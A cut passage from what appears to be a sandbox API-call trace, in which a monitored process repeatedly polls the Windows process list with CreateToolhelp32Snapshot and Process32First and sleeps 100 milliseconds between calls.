th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.922] Sleep (dwMilliseconds=0x64) [0252.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0252.978] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.092] Sleep (dwMilliseconds=0x64) [0253.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0253.164] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.256] Sleep (dwMilliseconds=0x64) [0253.316] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0253.333] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.502] Sleep (dwMilliseconds=0x64) [0253.548] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0253.565] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.676] Sleep (dwMilliseconds=0x64) [0253.706] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0253.717] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.782] Sleep (dwMilliseconds=0x64) [0253.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0253.805] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.984] Sleep (dwMilliseconds=0x64) [0254.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0254.041] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.212] Sleep (dwMilliseconds=0x64) [0254.216] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0254.227] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.295] Sleep (dwMilliseconds=0x64) [0254.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0254.322] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.532] Sleep (dwMilliseconds=0x64) [0254.579] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0254.594] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.824] Sleep (dwMilliseconds=0x64) [0254.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0254.849] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.927] Sleep (dwMilliseconds=0x64) [0254.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0254.943] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.134] Sleep (dwMilliseconds=0x64) [0255.183] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0255.197] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.398] Sleep (dwMilliseconds=0x64) [0255.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0255.469] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.687] Sleep (dwMilliseconds=0x64) [0255.759] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0255.842] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.103] Sleep (dwMilliseconds=0x64) [0256.129] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0256.144] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.199] Sleep (dwMilliseconds=0x64) [0256.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0256.225] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.409] Sleep (dwMilliseconds=0x64) [0256.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0256.479] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.635] Sleep (dwMilliseconds=0x64) [0256.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0256.679] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.782] Sleep (dwMilliseconds=0x64) [0256.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0256.940] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.133] Sleep (dwMilliseconds=0x64) [0257.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0257.336] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.516] Sleep (dwMilliseconds=0x64) [0257.675] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0257.686] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.854] Sleep (dwMilliseconds=0x64) [0258.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0258.126] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.253] Sleep (dwMilliseconds=0x64) [0258.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0258.329] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.486] Sleep (dwMilliseconds=0x64) [0258.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0258.586] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.815] Sleep (dwMilliseconds=0x64) [0258.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0258.884] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.018] Sleep (dwMilliseconds=0x64) [0259.104] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0259.117] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.268] Sleep (dwMilliseconds=0x64) [0259.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0259.318] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.377] Sleep (dwMilliseconds=0x64) [0259.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0259.398] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.467] Sleep (dwMilliseconds=0x64) [0259.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0259.524] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.834] Sleep (dwMilliseconds=0x64) [0259.886] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0259.900] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.998] Sleep (dwMilliseconds=0x64) [0260.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0260.025] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.149] Sleep (dwMilliseconds=0x64) [0260.224] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0260.239] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.428] Sleep (dwMilliseconds=0x64) [0260.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0260.522] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.633] Sleep (dwMilliseconds=0x64) [0260.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0260.696] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.834] Sleep (dwMilliseconds=0x64) [0260.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0260.906] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.022] Sleep (dwMilliseconds=0x64) [0261.080] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0261.093] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.206] Sleep (dwMilliseconds=0x64) [0261.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0261.228] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.307] Sleep (dwMilliseconds=0x64) [0261.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0261.538] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.797] Sleep (dwMilliseconds=0x64) [0261.892] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0261.960] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.405] Sleep (dwMilliseconds=0x64) [0262.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0262.902] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.289] Sleep (dwMilliseconds=0x64) [0263.413] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0263.427] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.946] Sleep (dwMilliseconds=0x64) [0264.018] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0264.034] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.250] Sleep (dwMilliseconds=0x64) [0264.360] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0264.374] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.460] Sleep (dwMilliseconds=0x64) [0264.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0264.482] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.548] Sleep (dwMilliseconds=0x64) [0264.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0264.601] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.797] Sleep (dwMilliseconds=0x64) [0264.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0264.875] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.050] Sleep (dwMilliseconds=0x64) [0265.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0265.072] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.219] Sleep (dwMilliseconds=0x64) [0265.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0265.364] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.581] Sleep (dwMilliseconds=0x64) [0265.618] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0265.628] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.705] Sleep (dwMilliseconds=0x64) [0265.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0265.728] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.851] Sleep (dwMilliseconds=0x64) [0265.905] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0265.916] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.151] Sleep (dwMilliseconds=0x64) [0266.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0266.219] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.317] Sleep (dwMilliseconds=0x64) [0266.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0266.335] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.441] Sleep (dwMilliseconds=0x64) [0266.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0266.494] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.645] Sleep (dwMilliseconds=0x64) [0266.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0266.717] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.788] Sleep (dwMilliseconds=0x64) [0266.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0266.802] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.939] Sleep (dwMilliseconds=0x64) [0266.984] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0266.993] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.173] Sleep (dwMilliseconds=0x64) [0267.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0267.301] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.430] Sleep (dwMilliseconds=0x64) [0267.491] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0267.505] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 